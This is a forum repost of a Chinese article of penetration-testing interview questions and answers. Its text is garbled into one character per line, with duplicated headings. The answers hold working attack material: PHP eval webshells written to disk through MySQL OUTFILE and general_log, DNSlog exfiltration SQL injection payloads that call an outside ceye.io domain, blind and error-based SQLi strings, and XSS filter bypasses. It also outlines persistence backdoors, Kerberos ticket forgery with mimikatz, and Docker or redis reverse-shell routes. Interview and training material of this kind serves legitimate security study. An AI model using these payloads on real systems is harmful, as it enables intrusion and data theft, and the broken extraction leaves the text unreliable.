论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[21045] 2020-05-25_渗透测试面试近期热门题建议收藏
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-18
渗透测试
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-05-25_渗透测试面试近期热门题建议收藏
渗
透
测
试
面
试
近
期
热
门
题
建
议
收
藏
L
e
m
o
n
S
e
c
2
0
2
0
-
0
5
-
2
5
前
言
前
言
近
期
面
试
喜
欢
问
的
问
题
,
总
结
了
一
下
。
近
期
面
试
喜
欢
问
的
问
题
,
总
结
了
一
下
。
岗
位
分
析
岗
位
分
析
整
体
安
全
行
业
,
随
着
网
络
安
全
的
大
火
,
W
e
b
安
全
入
门
浅
,
培
训
机
构
遍
地
开
会
,
大
量
花
里
胡
哨
的
人
才
都
争
着
用
了
进
来
,
所
以
想
要
突
出
,
必
须
要
有
自
己
的
一
技
之
长
。
那
么
当
前
网
络
安
全
的
技
术
岗
位
,
热
门
方
向
有
很
多
,
说
几
个
例
子
。
逆
向
逆
向
A
P
T
代
码
审
计
代
码
审
计
区
块
链
区
块
链
渗
透
(
不
限
于
内
网
、
渗
透
(
不
限
于
内
网
、
C
S
客
户
端
,
客
户
端
,
A
P
P
,
小
程
序
,
微
服
务
等
)
,
小
程
序
,
微
服
务
等
)
常
见
面
试
题
及
参
考
常
见
面
试
题
及
参
考
问
:
问
:
M
y
S
Q
L
写
写
W
e
b
S
h
e
l
l
有
几
种
方
式
,
利
用
条
件
有
几
种
方
式
,
利
用
条
件
答
:
一
、
u
n
i
o
n
s
e
l
e
c
t
后
写
入
l
i
n
e
s
t
e
r
m
i
n
a
t
e
d
b
y
写
入
l
i
n
e
s
s
t
a
r
t
i
n
g
b
y
写
入
f
i
e
l
d
s
t
e
r
m
i
n
a
t
e
d
b
y
写
入
C
O
L
U
M
N
S
t
e
r
m
i
n
a
t
e
d
b
y
写
入
二
、
r
o
o
t
权
限
G
P
C
关
闭
(
能
使
用
单
引
号
)
,
m
a
g
i
c
_
q
u
o
t
e
s
_
g
p
c
=
O
n
有
绝
对
路
径
(
读
文
件
可
以
不
用
,
写
文
件
必
须
)
没
有
配
置
–
s
e
c
u
r
e
-
f
i
l
e
-
p
r
i
v
成
功
条
件
:
有
读
写
的
权
限
,
有
c
r
e
a
t
e
、
i
n
s
e
r
t
、
s
e
l
e
c
t
的
权
限
问
:
问
:
S
q
l
注
入
无
回
显
的
情
况
下
,
利
用
注
入
无
回
显
的
情
况
下
,
利
用
D
N
S
l
o
g
,
,
m
y
s
q
l
下
利
用
什
么
构
造
代
码
,
下
利
用
什
么
构
造
代
码
,
m
s
s
q
l
下
又
如
何
?
下
又
如
何
?
答
:
(
1
)
没
有
回
显
的
情
况
下
,
一
般
编
写
脚
本
,
进
行
自
动
化
注
入
。
但
与
此
同
时
,
由
于
防
火
墙
的
存
在
,
容
易
被
封
禁
I
P
,
可
以
尝
试
调
整
请
求
频
率
,
有
条
件
的
使
用
代
理
池
进
行
请
求
。
(
2
)
此
时
也
可
以
使
用
D
N
S
l
o
g
注
入
,
原
理
就
是
把
服
务
器
返
回
的
结
果
放
在
域
名
中
,
然
后
读
取
D
N
S
解
析
时
的
日
志
,
来
获
取
想
要
的
信
息
。
(
3
)
M
y
s
q
l
中
利
用
l
o
a
d
_
f
i
l
e
(
)
构
造
p
a
y
l
o
a
d
‘
a
n
d
i
f
(
(
s
e
l
e
c
t
l
o
a
d
_
f
i
l
e
(
c
o
n
c
a
t
(
‘
’
,
(
s
e
l
e
c
t
d
a
t
a
b
a
s
e
(
)
)
,
’
.
x
x
x
.
c
e
y
e
.
i
o
a
b
c
’
)
)
)
,
1
,
0
)
#
(
4
)
M
s
s
q
l
下
利
用
m
a
s
t
e
r
.
.
x
p
_
d
i
r
t
r
e
e
构
造
p
a
y
l
o
a
d
D
E
C
L
A
R
E
@
h
o
s
t
v
a
r
c
h
a
r
(
1
0
2
4
)
;
S
E
L
E
C
T
@
h
o
s
t
=
(
S
E
L
E
C
T
d
b
_
n
a
m
e
(
)
)
+
’
.
x
x
x
.
c
e
y
e
.
i
o
’
;
E
X
E
C
(
‘
m
a
s
t
e
r
.
.
x
p
_
d
i
r
t
r
e
e
”
’
+
@
h
o
s
t
+
’
f
o
o
b
a
r
$
”
‘
)
;
问
:
问
:
p
h
p
m
y
a
d
m
i
n
写
写
s
e
h
l
l
的
方
法
的
方
法
答
:
一
、
常
规
导
入
s
h
e
l
l
的
操
作
创
建
数
据
表
导
出
s
h
e
l
l
C
R
E
A
T
E
T
A
B
L
E
`
m
y
s
q
l
`
.
`
s
h
a
d
o
w
9
`
(
`
c
o
n
t
e
n
t
`
T
E
X
T
N
O
T
N
U
L
L
)
;
I
N
S
E
R
T
I
N
T
O
`
m
y
s
q
l
`
.
`
s
h
a
d
o
w
9
`
(
`
c
o
n
t
e
n
t
`
)
V
A
L
U
E
S
(
‘
<
?
p
h
p
@
e
v
a
l
(
$
_
P
O
S
T
[
p
a
s
s
]
)
;
?
>
’
)
;
S
E
L
E
C
T
`
c
o
n
t
e
n
t
`
F
R
O
M
`
s
h
a
d
o
w
9
`
I
N
T
O
O
U
T
F
I
L
E
‘
C
:
p
h
p
S
t
u
d
y
W
W
W
9
0
s
e
c
.
p
h
p
’
;
D
R
O
P
T
A
B
L
E
I
F
E
X
I
S
T
S
`
s
h
a
d
o
w
9
`
;
二
、
一
句
话
导
出
s
h
e
l
l
:
三
、
日
志
备
份
获
取
s
h
e
l
l
s
e
l
e
c
t
'
<
?
p
h
p
@
e
v
a
l
(
$
_
P
O
S
T
[
p
a
s
s
]
)
;
?
>
'
i
n
t
o
o
u
t
f
i
l
e
'
c
:
/
p
h
p
s
t
u
d
y
/
w
w
w
/
9
0
s
e
c
.
p
h
p
'
;
s
e
l
e
c
t
'
<
?
p
h
p
@
e
v
a
l
(
$
_
P
O
S
T
[
p
a
s
s
]
)
;
?
>
'
i
n
t
o
o
u
t
f
i
l
e
'
c
:
p
h
p
s
t
u
d
y
w
w
w
9
0
s
e
c
.
p
h
p
'
;
s
e
l
e
c
t
'
<
?
p
h
p
@
e
v
a
l
(
$
_
P
O
S
T
[
p
a
s
s
]
)
;
?
>
'
i
n
t
o
d
u
m
p
f
i
l
e
'
c
:
p
h
p
s
t
u
d
y
w
w
w
b
y
p
a
s
s
.
p
h
p
'
;
问
:
权
限
维
持
的
方
法
问
:
权
限
维
持
的
方
法
答
:
留
自
启
动
后
门
方
法
很
多
,
大
多
数
都
添
加
到
服
务
,
加
注
册
表
加
启
动
项
,
w
i
n
d
o
w
s
:
:
1
.
替
换
系
统
文
件
类
(
s
h
i
f
t
后
门
,
放
大
镜
后
门
)
2
.
修
改
注
册
表
类
自
启
动
项
、
屏
幕
保
护
程
序
注
册
表
、
用
户
登
陆
初
始
化
、
登
录
脚
本
、
映
像
劫
持
、
影
子
账
户
、
A
p
p
C
e
r
t
D
l
l
s
注
册
表
项
、
A
p
p
I
n
i
t
_
D
L
L
s
注
册
表
项
、
文
件
关
联
、
用
户
登
陆
初
始
化
、
x
x
.
N
e
t
s
h
H
e
l
p
e
r
D
L
L
3
.
文
件
类
自
启
动
文
件
夹
、
o
f
f
i
c
e
W
o
r
d
S
t
a
r
t
U
p
劫
持
4
.
计
划
任
务
s
c
h
t
a
s
k
s
、
W
M
I
、
b
i
t
s
a
d
m
i
n
L
i
n
u
x
1
.
预
加
载
型
动
态
链
接
库
后
门
2
.
s
t
r
a
c
e
后
门
3
.
S
S
H
后
门
4
.
S
U
I
D
后
门
5
.
i
n
e
t
d
服
务
后
门
6
.
协
议
后
门
7
.
v
i
m
后
门
8
.
P
A
M
后
门
9
.
进
程
注
入
s
h
o
w
g
l
o
b
a
l
v
a
r
i
a
b
l
e
s
l
i
k
e
"
%
g
e
n
e
r
a
%
"
;
/
/
查
询
g
e
n
e
r
a
l
_
l
o
g
配
置
s
e
t
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
=
'
o
n
'
;
/
/
开
启
g
e
n
e
r
a
l
l
o
g
模
式
S
E
T
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
_
f
i
l
e
=
'
D
:
/
p
h
p
S
t
u
d
y
/
W
W
W
/
c
m
d
.
p
h
p
'
;
/
/
设
置
日
志
文
件
保
存
路
径
S
E
L
E
C
T
'
<
?
p
h
p
p
h
p
i
n
f
o
(
)
;
?
>
'
;
/
/
p
h
p
i
n
f
o
(
)
写
入
日
志
文
件
s
e
t
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
=
'
o
f
f
'
;
/
/
关
闭
g
e
n
e
r
a
l
_
l
o
g
模
式
1
0
.
R
o
o
t
k
i
t
1
1
.
端
口
复
用
M
S
F
权
限
维
持
权
限
维
持
1
.
P
e
r
s
i
s
t
e
n
c
e
模
块
2
.
M
e
t
s
v
c
模
块
P
o
w
e
r
s
h
e
l
l
权
限
维
持
权
限
维
持
C
S
权
限
维
持
权
限
维
持
S
C
命
令
问
:
问
:
X
X
E
漏
洞
原
理
,
代
码
审
计
如
何
寻
找
?
漏
洞
原
理
,
代
码
审
计
如
何
寻
找
?
答
:
(
1
)
X
X
E
(
X
M
L
外
部
实
体
注
入
)
当
应
用
允
许
引
用
X
M
L
外
部
实
体
时
,
攻
击
者
通
过
构
造
恶
意
内
容
,
就
可
能
进
行
任
意
文
件
读
取
、
系
统
命
令
执
行
、
内
网
端
口
探
测
、
内
网
网
站
攻
击
等
操
作
。
支
持
的
协
议
如
下
图
:
J
a
v
a
:
支
持
h
t
t
p
、
h
t
t
p
s
、
f
i
l
e
、
f
t
p
、
m
a
i
l
t
o
、
j
a
r
、
n
e
t
d
o
c
、
(
1
.
8
不
支
持
g
o
p
h
e
r
)
(
2
)
审
计
函
数
,
涉
及
到
X
M
L
文
件
处
理
,
都
可
能
造
成
X
X
E
(
3
)
防
御
方
法
:
禁
用
外
部
实
体
问
:
问
:
S
S
R
F
禁
用
禁
用
1
2
7
.
0
.
0
.
1
后
如
何
绕
过
,
支
持
哪
些
协
议
?
后
如
何
绕
过
,
支
持
哪
些
协
议
?
答
:
(
1
)
利
用
进
制
转
换
(
2
)
利
用
D
N
S
解
析
(
3
)
利
用
句
号
(
1
2
7
。
0
。
0
。
1
)
(
4
)
利
用
[
:
:
]
(
h
t
t
p
:
/
/
[
:
:
]
:
8
0
/
)
;
(
5
)
利
用
@
(
h
t
t
p
:
/
/
e
x
a
m
p
l
e
.
c
o
m
@
1
2
7
.
0
.
0
.
1
)
;
(
6
)
利
用
短
地
址
(
h
t
t
p
:
/
/
d
w
z
.
c
n
/
1
1
S
M
a
)
;
(
7
)
协
议
(
D
i
c
t
:
/
/
、
S
F
T
P
:
/
/
、
T
F
T
P
:
/
/
、
L
D
A
P
:
/
/
、
G
o
p
h
e
r
:
/
/
)
问
:
应
急
响
应
如
何
查
找
挖
矿
病
毒
,
如
何
通
过
进
程
找
到
挖
矿
文
件
问
:
应
急
响
应
如
何
查
找
挖
矿
病
毒
,
如
何
通
过
进
程
找
到
挖
矿
文
件
答
:
(
1
)
任
务
管
理
器
n
e
t
s
t
a
t
-
a
n
p
寻
找
异
常
进
程
P
I
D
看
端
口
信
息
,
然
后
根
据
端
口
信
息
定
位
到
文
件
,
c
d
/
p
r
o
c
/
P
I
D
(
l
s
-
l
查
看
)
,
禁
用
可
疑
的
服
务
项
。
(
2
)
w
i
n
d
o
w
s
还
可
以
用
w
m
i
c
分
析
进
程
参
数
问
:
问
:
s
t
r
u
t
s
2
框
架
漏
洞
原
理
框
架
漏
洞
原
理
答
:
(
1
)
s
t
r
u
t
s
是
j
a
v
a
的
w
e
b
框
架
(
2
)
采
取
O
G
N
L
表
达
式
,
处
理
v
i
e
w
层
数
据
字
符
串
到
c
o
n
t
r
o
l
l
e
r
层
转
换
成
j
a
v
a
对
象
(
3
)
重
点
关
注
的
编
号
加
粗
如
下
S
2
-
0
5
7
影
响
范
围
非
常
小
S
2
-
0
4
8
影
响
范
围
非
常
小
S
2
-
0
4
6
和
和
S
2
-
0
4
5
一
样
一
样
S
2
-
0
4
5
影
响
范
围
较
大
影
响
范
围
较
大
—
-
通
过
通
过
C
o
n
t
e
n
t
-
T
y
p
e
这
个
这
个
h
e
a
d
e
r
头
,
进
而
执
行
命
令
,
通
过
头
,
进
而
执
行
命
令
,
通
过
S
t
r
u
s
2
对
错
误
消
息
处
理
进
行
回
显
对
错
误
消
息
处
理
进
行
回
显
S
2
-
0
3
7
影
响
范
围
小
S
2
-
0
3
2
影
响
范
围
小
S
2
-
0
2
0
影
响
范
围
小
S
2
-
0
1
9
影
响
范
围
一
般
S
2
-
0
1
6
影
响
范
围
非
常
大
影
响
范
围
非
常
大
S
2
-
0
1
3
S
2
-
0
1
6
范
围
内
S
2
-
0
0
9
S
2
-
0
1
6
范
围
内
S
2
-
0
0
5
S
2
-
0
1
6
范
围
内
问
:
问
:
J
A
V
A
反
序
列
化
原
理
反
序
列
化
原
理
答
:
(
1
)
J
a
v
a
序
列
化
指
J
a
v
a
对
象
转
换
为
字
节
序
列
的
过
程
(
2
)
J
a
v
a
反
序
列
化
指
字
节
序
列
恢
复
为
J
a
v
a
对
象
的
过
程
(
3
)
C
o
m
m
o
n
s
-
c
o
l
l
e
c
t
i
o
n
s
爆
出
第
一
个
漏
洞
开
始
,
J
a
v
a
反
序
列
化
漏
洞
的
事
件
就
层
出
不
穷
。
(
4
)
在
J
a
v
a
中
,
利
用
O
b
j
e
c
t
I
n
p
u
t
S
t
r
e
a
m
的
r
e
a
d
O
b
j
e
c
t
方
法
进
行
对
象
读
取
(
5
)
可
以
深
入
了
解
y
s
o
s
e
r
i
a
l
有
哪
些
g
a
d
g
e
t
s
问
:
问
:
c
o
r
s
如
何
产
生
,
有
哪
些
利
用
方
式
?
绕
过
同
源
策
略
的
方
法
有
哪
些
?
如
何
产
生
,
有
哪
些
利
用
方
式
?
绕
过
同
源
策
略
的
方
法
有
哪
些
?
j
s
o
n
p
跨
域
如
何
利
用
?
跨
域
如
何
利
用
?
答
:
(
1
)
C
O
R
S
全
称
是
”
跨
域
资
源
共
享
”
(
C
r
o
s
s
-
o
r
i
g
i
n
r
e
s
o
u
r
c
e
s
h
a
r
i
n
g
)
,
O
r
i
g
i
n
源
未
严
格
,
从
而
造
成
跨
域
问
题
,
允
许
浏
览
器
向
跨
源
服
务
器
,
发
出
X
M
L
H
t
t
p
R
e
q
u
e
s
t
请
求
(
2
)
O
r
i
g
i
n
为
*
的
时
候
,
使
用
c
u
r
l
测
试
C
O
R
S
,
c
u
r
l
<
u
r
l
>
-
H
“
O
r
i
g
i
n
:
h
t
t
p
s
:
/
/
e
v
i
l
.
c
o
m
”
-
I
再
寻
找
的
a
p
i
接
口
是
否
有
敏
感
信
息
泄
漏
。
(
3
)
同
源
:
协
议
相
同
、
域
名
相
同
、
端
口
相
同
,
绕
过
同
源
策
略
限
制
的
方
法
:
1
、
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
属
性
2
、
片
段
识
别
符
(
U
R
L
后
加
#
号
)
3
、
w
i
n
d
o
w
.
n
a
m
e
4
、
跨
文
档
通
信
A
P
I
5
、
J
S
O
N
P
6
、
C
O
R
S
7
、
W
e
b
S
o
c
k
e
t
s
(
4
)
j
s
o
n
p
跨
域
利
用
:
获
取
J
S
O
N
数
据
并
编
码
发
送
到
远
程
服
务
器
上
问
:
问
:
p
h
a
r
协
议
如
何
利
用
,
协
议
如
何
利
用
,
p
h
p
伪
协
议
伪
协
议
i
n
p
u
t
与
与
p
o
s
t
数
据
包
发
送
有
什
么
区
别
?
数
据
包
发
送
有
什
么
区
别
?
答
:
(
1
)
可
以
B
y
p
a
s
s
一
些
w
a
f
,
绕
过
上
传
限
制
(
2
)
P
h
a
r
反
序
列
化
,
P
h
a
r
:
/
/
伪
协
议
读
取
p
h
a
r
文
件
时
,
会
反
序
列
化
m
e
t
a
-
d
a
t
a
储
存
(
3
)
区
别
一
、
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
或
m
u
l
t
i
p
a
r
t
/
f
o
r
m
-
d
a
t
a
时
p
h
p
:
/
/
i
n
p
u
t
中
是
原
始
数
据
。
$
_
P
O
S
T
中
是
关
联
数
组
,
且
没
有
上
传
控
件
的
内
容
。
二
、
e
n
c
t
y
p
e
=
”
m
u
l
t
i
p
a
r
t
/
f
o
r
m
-
d
a
t
a
”
时
p
h
p
:
/
/
i
n
p
u
t
是
无
效
的
。
三
、
C
o
n
t
e
n
t
-
T
y
p
e
=
“
t
e
x
t
/
p
l
a
i
n
”
时
$
_
P
O
S
T
不
能
获
取
p
o
s
t
的
数
据
,
p
h
p
:
/
/
i
n
p
u
t
可
以
。
问
:
内
网
服
务
器
,
如
何
进
行
信
息
收
集
问
:
内
网
服
务
器
,
如
何
进
行
信
息
收
集
答
:
答
:
(
1
)
手
动
,
用
一
些
小
工
具
(
批
量
看
存
活
)
n
e
w
u
s
e
r
/
d
o
m
a
i
n
查
域
、
n
e
t
v
i
e
w
看
共
享
、
h
o
s
t
s
文
件
内
网
i
p
域
名
映
射
、
w
i
f
i
记
录
和
密
码
、
浏
览
器
中
的
密
码
、
敏
感
文
件
、
各
类
服
务
的
配
置
文
件
中
信
息
、
历
史
命
令
、
s
s
h
私
钥
、
F
T
P
的
连
接
信
息
、
x
s
h
e
l
l
等
s
s
h
连
接
工
具
的
s
e
s
s
i
o
n
文
件
,
3
3
8
9
连
接
历
史
和
被
连
接
历
史
信
息
、
某
些
内
网
a
p
i
接
口
未
授
权
访
问
(
2
)
扫
描
器
主
机
扫
描
、
端
口
扫
描
、
漏
洞
扫
描
、
识
别
内
网
环
境
、
密
码
爆
破
、
抓
密
码
(
3
)
留
后
门
,
抓
信
息
问
:
内
网
黄
金
票
据
、
白
银
票
据
的
区
别
和
利
用
方
式
问
:
内
网
黄
金
票
据
、
白
银
票
据
的
区
别
和
利
用
方
式
答
:
(
1
)
白
银
票
据
:
抓
取
到
了
域
控
服
务
h
a
s
h
的
情
况
下
,
在
客
户
端
以
一
个
普
通
域
用
户
的
身
份
生
成
T
G
S
票
据
,
并
且
是
针
对
于
某
个
机
器
上
的
某
个
服
务
的
,
生
成
的
白
银
票
据
,
只
能
访
问
指
定
的
t
a
r
g
e
t
机
器
中
指
定
的
服
务
。
黄
金
票
据
:
直
接
抓
取
域
控
中
账
号
的
h
a
s
h
,
来
在
c
l
i
e
n
t
端
生
成
一
个
T
G
T
票
据
,
那
么
该
票
据
是
针
对
所
有
机
器
的
所
有
服
务
。
(
2
)
通
过
m
i
m
k
a
t
z
执
行
,
导
出
域
控
中
账
号
的
H
a
s
h
问
:
问
:
d
o
c
k
e
r
远
程
远
程
a
p
i
漏
洞
原
理
漏
洞
原
理
答
:
(
1
)
d
o
c
k
e
r
s
w
a
r
m
是
一
个
将
d
o
c
k
e
r
集
群
变
成
单
一
虚
拟
的
d
o
c
k
e
r
h
o
s
t
工
具
,
使
用
标
准
的
D
o
c
k
e
r
A
P
I
,
能
够
方
便
d
o
c
k
e
r
集
群
的
管
理
和
扩
展
,
该
未
授
权
访
问
,
可
以
通
过
u
r
l
操
作
,
执
行
d
o
c
k
e
r
命
令
。
(
2
)
通
过
d
o
c
k
e
r
c
l
i
e
n
t
执
行
目
标
服
务
器
容
器
命
令
,
d
o
c
k
e
r
是
以
r
o
o
t
权
限
运
行
的
一
、
有
运
行
s
s
h
服
务
,
/
r
o
o
t
/
.
s
s
h
目
录
挂
载
到
c
o
n
t
a
i
n
e
r
内
,
,
然
后
修
改
/
.
s
s
h
/
a
u
t
h
o
r
i
z
e
d
_
k
e
y
s
文
件
,
把
自
己
的
p
u
b
l
i
c
k
e
y
写
进
去
二
、
没
有
运
行
s
s
h
服
务
,
利
用
挂
载
写
c
r
o
n
t
a
b
定
时
任
务
,
反
弹
一
个
s
h
e
l
l
问
:
问
:
s
s
r
f
怎
么
用
怎
么
用
r
e
d
i
s
写
写
s
h
e
l
l
答
:
(
1
)
S
S
R
F
服
务
端
请
求
伪
造
一
、
对
内
网
扫
描
,
获
取
b
a
n
n
e
r
二
、
攻
击
运
行
在
内
网
的
应
用
,
主
要
是
使
用
G
E
T
参
数
就
可
以
实
现
的
攻
击
(
比
如
S
t
r
u
t
s
2
,
s
q
l
i
等
)
三
、
利
用
协
议
读
取
本
地
文
件
四
、
云
计
算
环
境
A
W
S
G
o
o
g
l
e
C
l
o
u
d
环
境
可
以
调
用
内
网
操
作
E
C
S
的
A
P
I
(
2
)
如
w
e
b
l
i
g
i
c
S
S
R
F
漏
洞
通
过
S
S
R
F
的
g
o
p
h
e
r
协
议
操
作
内
网
的
r
e
d
i
s
,
利
用
r
e
d
i
s
将
反
弹
s
h
e
l
l
写
入
c
r
o
n
t
a
b
定
时
任
务
,
u
r
l
编
码
,
将
r
字
符
串
替
换
成
%
0
d
%
0
a
问
:
预
编
译
能
否
问
:
预
编
译
能
否
1
0
0
%
防
防
s
q
l
注
入
,
如
果
不
能
,
写
一
个
注
入
,
如
果
不
能
,
写
一
个
答
:
不
能
。
一
、
类
似
于
宽
字
节
注
入
二
、
参
数
n
a
m
e
是
一
串
数
组
,
P
D
O
不
会
生
效
三
、
$
p
d
o
-
>
q
u
e
r
y
(
'
S
E
T
N
A
M
E
S
g
b
k
'
)
;
$
v
a
r
=
"
x
b
f
x
2
7
O
R
1
=
1
/
*
"
;
$
q
u
e
r
y
=
'
S
E
L
E
C
T
*
F
R
O
M
t
e
s
t
W
H
E
R
E
n
a
m
e
=
?
L
I
M
I
T
1
'
;
$
s
t
m
t
=
$
p
d
o
-
>
p
r
e
p
a
r
e
(
$
q
u
e
r
y
)
;
$
s
t
m
t
-
>
e
x
e
c
u
t
e
(
a
r
r
a
y
(
$
v
a
r
)
)
;
$
d
b
h
=
n
e
w
P
D
O
(
"
t
x
f
"
)
;
$
n
a
m
e
=
$
_
G
E
T
[
'
n
a
m
e
'
]
;
$
s
t
m
t
=
$
d
b
h
-
>
p
r
e
p
a
r
e
(
'
S
E
L
E
C
T
*
F
R
O
M
'
.
$
n
a
m
e
.
'
w
h
e
r
e
u
s
e
r
n
a
m
e
=
:
u
s
e
r
n
a
m
e
'
)
;
$
s
t
m
t
-
>
e
x
e
c
u
t
e
(
a
r
r
a
y
(
'
:
u
s
e
r
n
a
m
e
'
=
>
$
_
R
E
Q
U
E
S
T
[
'
u
s
e
r
n
a
m
e
'
]
)
)
;
P
D
O
对
D
D
L
不
生
效
问
:
问
:
W
A
F
绕
过
绕
过
答
:
1
注
释
替
换
空
格
2
字
符
集
绕
过
3
c
h
u
n
k
e
d
绕
过
4
上
传
请
求
m
u
l
t
i
p
a
r
t
绕
过
5
.
参
数
污
染
。
。
。
问
:
问
:
S
Q
L
注
入
构
造
注
入
构
造
p
a
y
l
o
a
d
答
:
一
、
布
尔
型
盲
注
(
1
)
m
y
s
q
l
:
‘
a
n
d
(
l
e
n
g
t
h
(
d
a
t
a
b
a
s
e
(
)
)
)
>
1
0
–
+
(
2
)
o
r
a
c
l
e
:
‘
a
n
d
1
=
(
s
e
l
e
c
t
d
e
c
o
d
e
(
u
s
e
r
,
’
S
C
O
T
T
’
,
1
,
0
)
f
r
o
m
d
u
a
l
)
–
二
、
时
间
型
盲
注
a
n
d
i
f
(
a
s
c
i
i
(
s
u
b
s
t
r
(
(
s
e
l
e
c
t
d
a
t
a
b
a
s
e
(
)
)
,
1
,
1
)
)
>
1
1
5
,
1
,
s
l
e
e
p
(
5
)
)
三
、
利
用
报
错
回
显
(
1
)
e
x
t
r
a
c
t
v
a
l
u
e
a
n
d
e
x
t
r
a
c
t
v
a
l
u
e
(
1
,
c
o
n
c
a
t
(
0
x
7
e
,
(
s
e
l
e
c
t
d
a
t
a
b
a
s
e
(
)
)
)
)
(
2
)
u
p
d
a
t
e
x
m
l
u
p
d
a
t
e
x
m
l
(
1
,
c
o
n
c
a
t
(
0
x
7
e
,
(
s
e
l
e
c
t
@
@
v
e
r
s
i
o
n
)
,
0
x
7
e
)
,
1
)
问
:
问
:
U
D
F
提
权
原
理
提
权
原
理
答
:
利
用
了
r
o
o
t
高
权
限
,
创
建
带
有
调
用
c
m
d
的
函
数
的
u
d
f
.
d
l
l
动
态
链
接
库
,
导
出
u
d
f
.
d
l
l
文
件
后
,
我
们
就
可
以
直
接
在
命
令
框
输
入
c
m
d
问
:
提
权
方
式
问
:
提
权
方
式
$
s
t
m
t
=
$
d
b
h
-
>
p
r
e
p
a
r
e
(
'
S
E
L
E
C
T
*
F
R
O
M
f
o
o
O
R
D
E
R
B
Y
:
u
s
e
r
S
u
p
p
l
i
e
d
D
a
t
a
'
)
;
答
:
w
i
n
d
o
w
s
:
1
.
s
y
s
t
m
i
n
f
o
,
根
据
系
统
补
丁
提
权
2
.
第
三
方
服
务
提
权
3
.
数
据
库
提
权
。
。
。
l
i
n
u
x
:
1
.
利
用
系
统
内
核
漏
洞
进
行
提
权
2
.
泄
漏
密
码
提
权
3
.
s
u
d
o
提
权
4
.
S
U
I
D
提
权
。
。
。
问
:
问
:
X
S
S
弹
窗
函
数
及
常
见
的
弹
窗
函
数
及
常
见
的
X
S
S
绕
过
策
略
绕
过
策
略
答
:
一
、
a
l
e
r
t
,
c
o
n
f
i
r
m
,
p
r
o
m
p
t
三
种
函
数
二
、
绕
过
策
略
1
.
大
小
写
混
合
2
.
双
写
3
.
编
码
4
.
f
u
z
z
低
频
使
用
标
签
<
d
e
t
a
i
l
s
/
o
p
e
n
/
o
n
t
o
g
g
l
e
>
5
.
f
u
z
z
低
频
使
用
函
数
o
n
t
o
g
g
l
e
等
6
.
<
i
m
g
/
s
r
c
=
1
>
7
.
%
0
a
或
者
%
0
d
绕
过
问
:
问
:
W
i
n
d
o
w
s
c
m
d
如
何
下
载
文
件
如
何
下
载
文
件
答
:
1
.
c
e
r
t
u
t
i
l
.
e
x
e
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试